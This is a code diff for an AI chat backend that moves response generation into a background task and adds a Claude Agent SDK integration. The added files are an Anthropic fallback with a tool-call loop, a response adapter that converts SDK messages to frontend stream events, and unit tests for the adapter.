@@ -239,6 +241,10 @@ async def get_session(
    active_task, last_message_id = await stream_registry.get_active_task_for_session(
        session_id, user_id
    )
+    logger.info(
+        f"[GET_SESSION] session={session_id}, active_task={active_task is not None}, "
+        f"msg_count={len(messages)}, last_role={messages[-1].get('role') if messages else 'none'}"
+    )
    if active_task:
        # Filter out the in-progress assistant message from the session response.
        # The client will receive the complete assistant response through the SSE
@@ -308,10 +314,9 @@ async def stream_chat_post(
        f"user={user_id}, message_len={len(request.message)}",
        extra={"json_fields": log_meta},
    )
-
-    _session = await _validate_and_get_session(session_id, user_id)  # noqa: F841
+    session = await _validate_and_get_session(session_id, user_id)
    logger.info(
-        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time)*1000:.1f}ms",
+        f"[TIMING] session validated in {(time.perf_counter() - stream_start_time) * 1000:.1f}ms",
        extra={
            "json_fields": {
                **log_meta,
@@ -320,6 +325,25 @@ async def stream_chat_post(
        },
    )

+    # Atomically append user message to session BEFORE creating task to avoid
+    # race condition where GET_SESSION sees task as "running" but message isn't
+    # saved yet.  append_and_save_message re-fetches inside a lock to prevent
+    # message loss from concurrent requests.
+    if request.message:
+        message = ChatMessage(
+            role="user" if request.is_user_message else "assistant",
+            content=request.message,
+        )
+        if request.is_user_message:
+            track_user_message(
+                user_id=user_id,
+                session_id=session_id,
+                message_length=len(request.message),
+            )
+        logger.info(f"[STREAM] Saving user message to session {session_id}")
+        session = await append_and_save_message(session_id, message)
+        logger.info(f"[STREAM] User message saved for session {session_id}")
+
    # Create a task in the stream registry for reconnection support
    task_id = str(uuid_module.uuid4())
    operation_id = str(uuid_module.uuid4())
@@ -335,7 +359,7 @@ async def stream_chat_post(
        operation_id=operation_id,
    )
    logger.info(
-        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start)*1000:.1f}ms",
+        f"[TIMING] create_task completed in {(time.perf_counter() - task_create_start) * 1000:.1f}ms",
        extra={
            "json_fields": {
                **log_meta,
@@ -344,20 +368,121 @@ async def stream_chat_post(
        },
    )

-    # Enqueue the task to RabbitMQ for processing by the CoPilot executor
-    await enqueue_copilot_task(
-        task_id=task_id,
-        session_id=session_id,
-        user_id=user_id,
-        operation_id=operation_id,
-        message=request.message,
-        is_user_message=request.is_user_message,
-        context=request.context,
-    )
+    # Background task that runs the AI generation independently of SSE connection
+    async def run_ai_generation():
+        import time as time_module

+        gen_start_time = time_module.perf_counter()
+        logger.info(
+            f"[TIMING] run_ai_generation STARTED, task={task_id}, session={session_id}, user={user_id}",
+            extra={"json_fields": log_meta},
+        )
+        first_chunk_time, ttfc = None, None
+        chunk_count = 0
+        try:
+            # Emit a start event with task_id for reconnection
+            start_chunk = StreamStart(messageId=task_id, taskId=task_id)
+            await stream_registry.publish_chunk(task_id, start_chunk)
+            logger.info(
+                f"[TIMING] StreamStart published at {(time_module.perf_counter() - gen_start_time) * 1000:.1f}ms",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": (time_module.perf_counter() - gen_start_time)
+                        * 1000,
+                    }
+                },
+            )
+
+            # Choose service based on configuration
+            use_sdk = config.use_claude_agent_sdk
+            stream_fn = (
+                sdk_service.stream_chat_completion_sdk
+                if use_sdk
+                else chat_service.stream_chat_completion
+            )
+            logger.info(
+                f"[TIMING] Calling {'sdk' if use_sdk else 'standard'} stream_chat_completion",
+                extra={"json_fields": log_meta},
+            )
+            # Pass message=None since we already added it to the session above
+            async for chunk in stream_fn(
+                session_id,
+                None,  # Message already in session
+                is_user_message=request.is_user_message,
+                user_id=user_id,
+                session=session,  # Pass session with message already added
+                context=request.context,
+            ):
+                # Skip duplicate StreamStart — we already published one above
+                if isinstance(chunk, StreamStart):
+                    continue
+                chunk_count += 1
+                if first_chunk_time is None:
+                    first_chunk_time = time_module.perf_counter()
+                    ttfc = first_chunk_time - gen_start_time
+                    logger.info(
+                        f"[TIMING] FIRST AI CHUNK at {ttfc:.2f}s, type={type(chunk).__name__}",
+                        extra={
+                            "json_fields": {
+                                **log_meta,
+                                "chunk_type": type(chunk).__name__,
+                                "time_to_first_chunk_ms": ttfc * 1000,
+                            }
+                        },
+                    )
+                # Write to Redis (subscribers will receive via XREAD)
+                await stream_registry.publish_chunk(task_id, chunk)
+
+            gen_end_time = time_module.perf_counter()
+            total_time = (gen_end_time - gen_start_time) * 1000
+            logger.info(
+                f"[TIMING] run_ai_generation FINISHED in {total_time / 1000:.1f}s; "
+                f"task={task_id}, session={session_id}, "
+                f"ttfc={ttfc or -1:.2f}s, n_chunks={chunk_count}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "total_time_ms": total_time,
+                        "time_to_first_chunk_ms": (
+                            ttfc * 1000 if ttfc is not None else None
+                        ),
+                        "n_chunks": chunk_count,
+                    }
+                },
+            )
+            await stream_registry.mark_task_completed(task_id, "completed")
+        except Exception as e:
+            elapsed = time_module.perf_counter() - gen_start_time
+            logger.error(
+                f"[TIMING] run_ai_generation ERROR after {elapsed:.2f}s: {e}",
+                extra={
+                    "json_fields": {
+                        **log_meta,
+                        "elapsed_ms": elapsed * 1000,
+                        "error": str(e),
+                    }
+                },
+            )
+            # Publish a StreamError so the frontend can display an error message
+            try:
+                await stream_registry.publish_chunk(
+                    task_id,
+                    StreamError(
+                        errorText="An error occurred. Please try again.",
+                        code="stream_error",
+                    ),
+                )
+            except Exception:
+                pass  # Best-effort; mark_task_completed will publish StreamFinish
+            await stream_registry.mark_task_completed(task_id, "failed")
+
+    # Start the AI generation in a background task
+    bg_task = asyncio.create_task(run_ai_generation())
+    await stream_registry.set_task_asyncio_task(task_id, bg_task)
    setup_time = (time.perf_counter() - stream_start_time) * 1000
    logger.info(
-        f"[TIMING] Task enqueued to RabbitMQ, setup={setup_time:.1f}ms",
+        f"[TIMING] Background task started, setup={setup_time:.1f}ms",
        extra={"json_fields": {**log_meta, "setup_time_ms": setup_time}},
    )

@@ -452,8 +577,14 @@ async def stream_chat_post(
                    "json_fields": {**log_meta, "elapsed_ms": elapsed, "error": str(e)}
                },
            )
+            # Surface error to frontend so it doesn't appear stuck
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="stream_error",
+            ).to_sse()
+            yield StreamFinish().to_sse()
        finally:
-            # Unsubscribe when client disconnects or stream ends to prevent resource leak
+            # Unsubscribe when client disconnects or stream ends
            if subscriber_queue is not None:
                try:
                    await stream_registry.unsubscribe_from_task(
@@ -697,8 +828,6 @@ async def stream_task(
        )

    async def event_generator() -> AsyncGenerator[str, None]:
-        import asyncio
-
        heartbeat_interval = 15.0  # Send heartbeat every 15 seconds
        try:
            while True:
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/init.py
@@ -0,0 +1,14 @@
+"""Claude Agent SDK integration for CoPilot.
+
+This module provides the integration layer between the Claude Agent SDK
+and the existing CoPilot tool system, enabling drop-in replacement of
+the current LLM orchestration with the battle-tested Claude Agent SDK.
+"""
+
+from .service import stream_chat_completion_sdk
+from .tool_adapter import create_copilot_mcp_server
+
+__all__ = [
+    "stream_chat_completion_sdk",
+    "create_copilot_mcp_server",
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/anthropic_fallback.py
@@ -0,0 +1,363 @@
+"""Anthropic SDK fallback implementation.
+
+This module provides the fallback streaming implementation using the Anthropic SDK
+directly when the Claude Agent SDK is not available.
+"""
+
+import json
+import logging
+import uuid
+from collections.abc import AsyncGenerator
+from typing import Any, cast
+
+from ..config import ChatConfig
+from ..model import ChatMessage, ChatSession
+from ..response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from .tool_adapter import get_tool_definitions, get_tool_handlers
+
+logger = logging.getLogger(__name__)
+config = ChatConfig()
+
+# Maximum tool-call iterations before stopping to prevent infinite loops
+_MAX_TOOL_ITERATIONS = 10
+
+
+async def stream_with_anthropic(
+    session: ChatSession,
+    system_prompt: str,
+    text_block_id: str,
+) -> AsyncGenerator[StreamBaseResponse, None]:
+    """Stream using Anthropic SDK directly with tool calling support.
+
+    Assistant and tool messages are appended to ``session.messages`` for
+    persistence; each assistant tool-call message is stored before its results.
+    The caller should NOT yield an additional StreamFinish - this function handles it.
+    """
+    import anthropic
+
+    # Use config.api_key (CHAT_API_KEY > OPEN_ROUTER_API_KEY > OPENAI_API_KEY)
+    # with config.base_url for OpenRouter routing — matching the non-SDK path.
+    api_key = config.api_key
+    if not api_key:
+        yield StreamError(
+            errorText="No API key configured (set CHAT_API_KEY or OPENAI_API_KEY)",
+            code="config_error",
+        )
+        yield StreamFinish()
+        return
+
+    # Build kwargs for the Anthropic client — use base_url if configured
+    client_kwargs: dict[str, Any] = {"api_key": api_key}
+    if config.base_url:
+        # Strip /v1 suffix — Anthropic SDK adds its own version path
+        base = config.base_url.rstrip("/")
+        if base.endswith("/v1"):
+            base = base[:-3]
+        client_kwargs["base_url"] = base
+
+    client = anthropic.AsyncAnthropic(**client_kwargs)
+    tool_definitions = get_tool_definitions()
+    tool_handlers = get_tool_handlers()
+
+    anthropic_tools = [
+        {
+            "name": t["name"],
+            "description": t["description"],
+            "input_schema": t["inputSchema"],
+        }
+        for t in tool_definitions
+    ]
+
+    anthropic_messages = _convert_session_to_anthropic(session)
+
+    if not anthropic_messages or anthropic_messages[-1]["role"] != "user":
+        anthropic_messages.append(
+            {"role": "user", "content": "Continue with the task."}
+        )
+
+    has_started_text = False
+    accumulated_text = ""
+    accumulated_tool_calls: list[dict[str, Any]] = []
+
+    for _ in range(_MAX_TOOL_ITERATIONS):
+        try:
+            async with client.messages.stream(
+                model=(
+                    config.model.split("/")[-1] if "/" in config.model else config.model
+                ),
+                max_tokens=4096,
+                system=system_prompt,
+                messages=cast(Any, anthropic_messages),
+                tools=cast(Any, anthropic_tools) if anthropic_tools else [],
+            ) as stream:
+                async for event in stream:
+                    if event.type == "content_block_start":
+                        block = event.content_block
+                        if hasattr(block, "type"):
+                            if block.type == "text" and not has_started_text:
+                                yield StreamTextStart(id=text_block_id)
+                                has_started_text = True
+                            elif block.type == "tool_use":
+                                yield StreamToolInputStart(
+                                    toolCallId=block.id, toolName=block.name
+                                )
+
+                    elif event.type == "content_block_delta":
+                        delta = event.delta
+                        if hasattr(delta, "type") and delta.type == "text_delta":
+                            accumulated_text += delta.text
+                            yield StreamTextDelta(id=text_block_id, delta=delta.text)
+
+                final_message = await stream.get_final_message()
+
+                if final_message.stop_reason == "tool_use":
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+                        has_started_text = False
+                        text_block_id = str(uuid.uuid4())
+
+                    tool_results = []
+                    assistant_content: list[dict[str, Any]] = []
+                    tool_messages: list[ChatMessage] = []
+
+                    for block in final_message.content:
+                        if block.type == "text":
+                            assistant_content.append(
+                                {"type": "text", "text": block.text}
+                            )
+                        elif block.type == "tool_use":
+                            assistant_content.append(
+                                {
+                                    "type": "tool_use",
+                                    "id": block.id,
+                                    "name": block.name,
+                                    "input": block.input,
+                                }
+                            )
+
+                            # Track tool call for session persistence
+                            accumulated_tool_calls.append(
+                                {
+                                    "id": block.id,
+                                    "type": "function",
+                                    "function": {
+                                        "name": block.name,
+                                        "arguments": json.dumps(
+                                            block.input
+                                            if isinstance(block.input, dict)
+                                            else {}
+                                        ),
+                                    },
+                                }
+                            )
+
+                            yield StreamToolInputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                input=(
+                                    block.input if isinstance(block.input, dict) else {}
+                                ),
+                            )
+
+                            output, is_error = await _execute_tool(
+                                block.name, block.input, tool_handlers
+                            )
+
+                            yield StreamToolOutputAvailable(
+                                toolCallId=block.id,
+                                toolName=block.name,
+                                output=output,
+                                success=not is_error,
+                            )
+
+                            # Buffer tool result (persisted after assistant msg)
+                            tool_messages.append(
+                                ChatMessage(
+                                    role="tool",
+                                    content=output,
+                                    tool_call_id=block.id,
+                                )
+                            )
+
+                            tool_results.append(
+                                {
+                                    "type": "tool_result",
+                                    "tool_use_id": block.id,
+                                    "content": output,
+                                    "is_error": is_error,
+                                }
+                            )
+
+                    # Save the assistant tool-call message first, then its results:
+                    # a tool message must follow the assistant turn that requested it
+                    session.messages.append(
+                        ChatMessage(
+                            role="assistant",
+                            content=accumulated_text or None,
+                            tool_calls=accumulated_tool_calls or None,
+                        )
+                    )
+                    session.messages.extend(tool_messages)
+                    # Reset for next iteration
+                    accumulated_text = ""
+                    accumulated_tool_calls = []
+
+                    anthropic_messages.append(
+                        {"role": "assistant", "content": assistant_content}
+                    )
+                    anthropic_messages.append({"role": "user", "content": tool_results})
+                    continue
+
+                else:
+                    if has_started_text:
+                        yield StreamTextEnd(id=text_block_id)
+
+                    # Save final assistant response to session
+                    if accumulated_text:
+                        session.messages.append(
+                            ChatMessage(role="assistant", content=accumulated_text)
+                        )
+
+                    yield StreamUsage(
+                        promptTokens=final_message.usage.input_tokens,
+                        completionTokens=final_message.usage.output_tokens,
+                        totalTokens=final_message.usage.input_tokens
+                        + final_message.usage.output_tokens,
+                    )
+                    yield StreamFinish()
+                    return
+
+        except Exception as e:
+            logger.error(f"[Anthropic Fallback] Error: {e}", exc_info=True)
+            yield StreamError(
+                errorText="An error occurred. Please try again.",
+                code="anthropic_error",
+            )
+            yield StreamFinish()
+            return
+
+    yield StreamError(errorText="Max tool iterations reached", code="max_iterations")
+    yield StreamFinish()
+
+
+def _convert_session_to_anthropic(session: ChatSession) -> list[dict[str, Any]]:
+    """Convert session messages to Anthropic format.
+
+    User messages pass through as text, assistant messages become text and
+    ``tool_use`` blocks, and tool messages become user ``tool_result`` blocks.
+    Other roles and empty assistant messages are skipped. Consecutive same-role
+    messages are merged afterwards (Anthropic requires alternating roles).
+    """
+    messages: list[dict[str, Any]] = []
+
+    for msg in session.messages:
+        if msg.role == "user":
+            new_msg = {"role": "user", "content": msg.content or ""}
+        elif msg.role == "assistant":
+            content: list[dict[str, Any]] = []
+            if msg.content:
+                content.append({"type": "text", "text": msg.content})
+            # Arguments may be stored as a JSON string or as a dict
+            for tc in msg.tool_calls or []:
+                func = tc.get("function", {})
+                args = func.get("arguments", {})
+                if isinstance(args, str):
+                    try:
+                        args = json.loads(args)
+                    except json.JSONDecodeError:
+                        args = {}
+                if not isinstance(args, dict):
+                    args = {}  # tool_use input must be a JSON object
+                content.append(
+                    {
+                        "type": "tool_use",
+                        "id": tc.get("id", str(uuid.uuid4())),
+                        "name": func.get("name", ""),
+                        "input": args,
+                    }
+                )
+            if not content:
+                continue  # Skip empty assistant messages
+            new_msg = {"role": "assistant", "content": content}
+        elif msg.role == "tool":
+            tool_result = {
+                "type": "tool_result",
+                "tool_use_id": msg.tool_call_id or "",
+                "content": msg.content or "",
+            }
+            new_msg = {"role": "user", "content": [tool_result]}
+        else:
+            continue
+
+        messages.append(new_msg)
+
+    # Merge consecutive same-role messages (Anthropic requires alternating roles)
+    return _merge_consecutive_roles(messages)
+
+
+def _merge_consecutive_roles(messages: list[dict[str, Any]]) -> list[dict[str, Any]]:
+    """Merge consecutive messages with the same role.
+
+    Anthropic API requires alternating user/assistant roles, so the content of
+    each run of same-role messages is concatenated into one list of content
+    blocks (plain strings are wrapped in text blocks first).
+
+    The input list and its message dicts are left unmodified.
+    """
+    if not messages:
+        return []
+
+    def as_blocks(content: Any) -> list[Any]:
+        # Normalize a str, a single block, or a list of blocks to a list
+        if isinstance(content, str):
+            return [{"type": "text", "text": content}]
+        return content if isinstance(content, list) else [content]
+
+    merged: list[dict[str, Any]] = []
+    for msg in messages:
+        if merged and merged[-1]["role"] == msg["role"]:
+            # Same role as the previous entry: fold this content into it
+            previous = merged[-1]
+            previous["content"] = [
+                *as_blocks(previous["content"]),
+                *as_blocks(msg["content"]),
+            ]
+        else:
+            # Shallow copy so a later merge never rewrites the caller's dict
+            merged.append(dict(msg))
+
+    return merged
+
+
+async def _execute_tool(
+    tool_name: str, tool_input: Any, handlers: dict[str, Any]
+) -> tuple[str, bool]:
+    """Execute a tool and return (output, is_error).
+
+    Output is the ``text`` of the handler result's first content item ("" if
+    absent). Unknown tools and handler exceptions are returned as errors.
+    """
+    handler = handlers.get(tool_name)
+    if not handler:
+        return f"Unknown tool: {tool_name}", True
+
+    try:
+        result = await handler(tool_input)
+        content = result.get("content")
+        first_item = content[0] if isinstance(content, list) and content else None
+        output = first_item.get("text", "") if isinstance(first_item, dict) else ""
+        return output, bool(result.get("isError", False))
+    except Exception as e:
+        logger.exception(f"[Anthropic Fallback] Tool {tool_name} failed")
+        return f"Error: {str(e)}", True
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter.py
@@ -0,0 +1,212 @@
+"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+This module provides the adapter layer that converts streaming messages from
+the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
+the frontend expects.
+"""
+
+import json
+import logging
+import uuid
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    Message,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+    StreamUsage,
+)
+from backend.api.features.chat.sdk.tool_adapter import (
+    MCP_TOOL_PREFIX,
+    pop_pending_tool_output,
+)
+
+logger = logging.getLogger(__name__)
+
+
+class SDKResponseAdapter:
+    """Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
+
+    This class maintains state during a streaming session to properly track
+    text blocks, tool calls, open steps, and message lifecycle.
+    """
+
+    def __init__(self, message_id: str | None = None):
+        self.message_id = message_id or str(uuid.uuid4())
+        self.text_block_id = str(uuid.uuid4())
+        self.has_started_text = False
+        self.has_ended_text = False
+        self.current_tool_calls: dict[str, dict[str, str]] = {}
+        self.task_id: str | None = None
+        self.step_open = False
+
+    def set_task_id(self, task_id: str) -> None:
+        """Set the task ID for reconnection support."""
+        self.task_id = task_id
+
+    def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
+        """Translate one SDK message into zero or more Vercel AI SDK stream events."""
+        responses: list[StreamBaseResponse] = []
+
+        if isinstance(sdk_message, SystemMessage):
+            if sdk_message.subtype == "init":
+                responses.append(
+                    StreamStart(messageId=self.message_id, taskId=self.task_id)
+                )
+                # Open the first step (matches non-SDK: StreamStart then StreamStartStep)
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+        elif isinstance(sdk_message, AssistantMessage):
+            # After tool results, the SDK sends a new AssistantMessage for the
+            # next LLM turn. Open a new step if the previous one was closed.
+            if not self.step_open:
+                responses.append(StreamStartStep())
+                self.step_open = True
+
+            for block in sdk_message.content:
+                if isinstance(block, TextBlock):
+                    if block.text:
+                        self._ensure_text_started(responses)
+                        responses.append(
+                            StreamTextDelta(id=self.text_block_id, delta=block.text)
+                        )
+
+                elif isinstance(block, ToolUseBlock):
+                    self._end_text_if_open(responses)
+
+                    # Strip MCP prefix so frontend sees "find_block"
+                    # instead of "mcp__copilot__find_block".
+                    tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
+
+                    responses.append(
+                        StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
+                    )
+                    responses.append(
+                        StreamToolInputAvailable(
+                            toolCallId=block.id,
+                            toolName=tool_name,
+                            input=block.input,
+                        )
+                    )
+                    self.current_tool_calls[block.id] = {"name": tool_name}
+
+        elif isinstance(sdk_message, UserMessage):
+            # UserMessage carries tool results back from tool execution.
+            content = sdk_message.content
+            blocks = content if isinstance(content, list) else []
+            for block in blocks:
+                if isinstance(block, ToolResultBlock) and block.tool_use_id:
+                    tool_info = self.current_tool_calls.get(block.tool_use_id, {})
+                    tool_name = tool_info.get("name", "unknown")
+
+                    # Prefer the stashed full output over the SDK's
+                    # (potentially truncated) ToolResultBlock content.
+                    # The SDK truncates large results, writing them to disk,
+                    # which breaks frontend widget parsing.
+                    output = pop_pending_tool_output(tool_name) or (
+                        _extract_tool_output(block.content)
+                    )
+
+                    responses.append(
+                        StreamToolOutputAvailable(
+                            toolCallId=block.tool_use_id,
+                            toolName=tool_name,
+                            output=output,
+                            success=not (block.is_error or False),
+                        )
+                    )
+
+            # Close the current step after tool results — the next
+            # AssistantMessage will open a new step for the continuation.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+        elif isinstance(sdk_message, ResultMessage):
+            self._end_text_if_open(responses)
+            # Close the step before finishing.
+            if self.step_open:
+                responses.append(StreamFinishStep())
+                self.step_open = False
+
+            # Emit token usage if the SDK reported it
+            usage = getattr(sdk_message, "usage", None) or {}
+            if usage:
+                input_tokens = usage.get("input_tokens", 0)
+                output_tokens = usage.get("output_tokens", 0)
+                responses.append(
+                    StreamUsage(
+                        promptTokens=input_tokens,
+                        completionTokens=output_tokens,
+                        totalTokens=input_tokens + output_tokens,
+                    )
+                )
+
+            if sdk_message.subtype == "success":
+                responses.append(StreamFinish())
+            else:  # any failure subtype (e.g. error_max_turns) must still end the stream
+                error_msg = getattr(sdk_message, "result", None) or "Unknown error"
+                responses.append(
+                    StreamError(errorText=str(error_msg), code="sdk_error")
+                )
+                responses.append(StreamFinish())
+
+        else:
+            logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
+
+        return responses
+
+    def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
+        """Start (or restart) a text block if needed."""
+        if not self.has_started_text or self.has_ended_text:
+            if self.has_ended_text:
+                self.text_block_id = str(uuid.uuid4())
+                self.has_ended_text = False
+            responses.append(StreamTextStart(id=self.text_block_id))
+            self.has_started_text = True
+
+    def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
+        """End the current text block if one is open."""
+        if self.has_started_text and not self.has_ended_text:
+            responses.append(StreamTextEnd(id=self.text_block_id))
+            self.has_ended_text = True
+
+
+def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+    """Extract a string output from a ToolResultBlock's content field.
+
+    Strings pass through, ``None`` becomes ``""``, text items of a list are joined
+    (non-dict items are ignored); anything else is JSON-encoded or ``str()``-ed.
+    """
+    if content is None:
+        return ""
+    if isinstance(content, str):
+        return content
+    if isinstance(content, list):
+        texts = [i for i in content if isinstance(i, dict) and i.get("type") == "text"]
+        if texts:
+            return "".join(i.get("text", "") for i in texts)
+    try:
+        return json.dumps(content)
+    except (TypeError, ValueError):
+        return str(content)
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/response_adapter_test.py
@@ -0,0 +1,366 @@
+"""Unit tests for the SDK response adapter."""
+
+from claude_agent_sdk import (
+    AssistantMessage,
+    ResultMessage,
+    SystemMessage,
+    TextBlock,
+    ToolResultBlock,
+    ToolUseBlock,
+    UserMessage,
+)
+
+from backend.api.features.chat.response_model import (
+    StreamBaseResponse,
+    StreamError,
+    StreamFinish,
+    StreamFinishStep,
+    StreamStart,
+    StreamStartStep,
+    StreamTextDelta,
+    StreamTextEnd,
+    StreamTextStart,
+    StreamToolInputAvailable,
+    StreamToolInputStart,
+    StreamToolOutputAvailable,
+)
+
+from .response_adapter import SDKResponseAdapter
+from .tool_adapter import MCP_TOOL_PREFIX
+
+
+def _adapter() -> SDKResponseAdapter:
+    a = SDKResponseAdapter(message_id="msg-1")
+    a.set_task_id("task-1")
+    return a
+
+
+# -- SystemMessage -----------------------------------------------------------
+
+
+def test_system_init_emits_start_and_step():
+    adapter = _adapter()
+    results = adapter.convert_message(SystemMessage(subtype="init", data={}))
+    assert len(results) == 2
+    assert isinstance(results[0], StreamStart)
+    assert results[0].messageId == "msg-1"
+    assert results[0].taskId == "task-1"
+    assert isinstance(results[1], StreamStartStep)
+
+
+def test_system_non_init_emits_nothing():
+    adapter = _adapter()
+    results = adapter.convert_message(SystemMessage(subtype="other", data={}))
+    assert results == []
+
+
+# -- AssistantMessage with TextBlock -----------------------------------------
+
+
+def test_text_block_emits_step_start_and_delta():
+    adapter = _adapter()
+    msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
+    results = adapter.convert_message(msg)
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamTextStart)
+    assert isinstance(results[2], StreamTextDelta)
+    assert results[2].delta == "hello"
+
+
+def test_empty_text_block_emits_only_step():
+    adapter = _adapter()
+    msg = AssistantMessage(content=[TextBlock(text="")], model="test")
+    results = adapter.convert_message(msg)
+    # Empty text skipped, but step still opens
+    assert len(results) == 1
+    assert isinstance(results[0], StreamStartStep)
+
+
+def test_multiple_text_deltas_reuse_block_id():
+    adapter = _adapter()
+    msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
+    msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
+    r1 = adapter.convert_message(msg1)
+    r2 = adapter.convert_message(msg2)
+    # First gets step+start+delta, second only delta (block & step already started)
+    assert len(r1) == 3
+    assert isinstance(r1[0], StreamStartStep)
+    assert isinstance(r1[1], StreamTextStart)
+    assert len(r2) == 1
+    assert isinstance(r2[0], StreamTextDelta)
+    assert r1[1].id == r2[0].id  # same block ID
+
+
+# -- AssistantMessage with ToolUseBlock --------------------------------------
+
+
+def test_tool_use_emits_input_start_and_available():
+    """Tool names arrive with MCP prefix and should be stripped for the frontend."""
+    adapter = _adapter()
+    msg = AssistantMessage(
+        content=[
+            ToolUseBlock(
+                id="tool-1",
+                name=f"{MCP_TOOL_PREFIX}find_agent",
+                input={"q": "x"},
+            )
+        ],
+        model="test",
+    )
+    results = adapter.convert_message(msg)
+    assert len(results) == 3
+    assert isinstance(results[0], StreamStartStep)
+    assert isinstance(results[1], StreamToolInputStart)
+    assert results[1].toolCallId == "tool-1"
+    assert results[1].toolName == "find_agent"  # prefix stripped
+    assert isinstance(results[2], StreamToolInputAvailable)
+    assert results[2].toolName == "find_agent"  # prefix stripped
+    assert results[2].input == {"q": "x"}
+
+
+def test_text_then_tool_ends_text_block():
+    adapter = _adapter()
+    text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
+    tool_msg = AssistantMessage(
+        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+        model="test",
+    )
+    adapter.convert_message(text_msg)  # opens step + text
+    results = adapter.convert_message(tool_msg)
+    # Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
+    assert len(results) == 3
+    assert isinstance(results[0], StreamTextEnd)
+    assert isinstance(results[1], StreamToolInputStart)
+
+
+# -- UserMessage with ToolResultBlock ----------------------------------------
+
+
+def test_tool_result_emits_output_and_finish_step():
+    adapter = _adapter()
+    # First register the tool call (opens step) — SDK sends prefixed name
+    tool_msg = AssistantMessage(
+        content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
+        model="test",
+    )
+    adapter.convert_message(tool_msg)
+
+    # Now send tool result
+    result_msg = UserMessage(
+        content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
+    )
+    results = adapter.convert_message(result_msg)
+    assert len(results) == 2
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].toolCallId == "t1"
+    assert results[0].toolName == "find_agent"  # prefix stripped
+    assert results[0].output == "found 3 agents"
+    assert results[0].success is True
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_tool_result_error():
+    adapter = _adapter()
+    adapter.convert_message(
+        AssistantMessage(
+            content=[
+                ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
+            ],
+            model="test",
+        )
+    )
+    result_msg = UserMessage(
+        content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
+    )
+    results = adapter.convert_message(result_msg)
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].success is False
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_tool_result_list_content():
+    adapter = _adapter()
+    adapter.convert_message(
+        AssistantMessage(
+            content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
+            model="test",
+        )
+    )
+    result_msg = UserMessage(
+        content=[
+            ToolResultBlock(
+                tool_use_id="t1",
+                content=[
+                    {"type": "text", "text": "line1"},
+                    {"type": "text", "text": "line2"},
+                ],
+            )
+        ]
+    )
+    results = adapter.convert_message(result_msg)
+    assert isinstance(results[0], StreamToolOutputAvailable)
+    assert results[0].output == "line1line2"
+    assert isinstance(results[1], StreamFinishStep)
+
+
+def test_string_user_message_ignored():
+    """A plain string UserMessage (not tool results) produces no output."""
+    adapter = _adapter()
+    results = adapter.convert_message(UserMessage(content="hello"))
+    assert results == []
+
+
+# -- ResultMessage -----------------------------------------------------------
+
+
+def test_result_success_emits_finish_step_and_finish():
+    adapter = _adapter()
+    # Start some text first (opens step)
+    adapter.convert_message(
+        AssistantMessage(content=[TextBlock(text="done")], model="test")
+    )
+    msg = ResultMessage(
+        subtype="success",
+        duration_ms=100,
+        duration_api_ms=50,
+        is_error=False,
+        num_turns=1,
+        session_id="s1",
+    )
+    results = adapter.convert_message(msg)
+    # TextEnd + FinishStep + StreamFinish
+    assert len(results) == 3
+    assert isinstance(results[0], StreamTextEnd)
+    assert isinstance(results[1], StreamFinishStep)
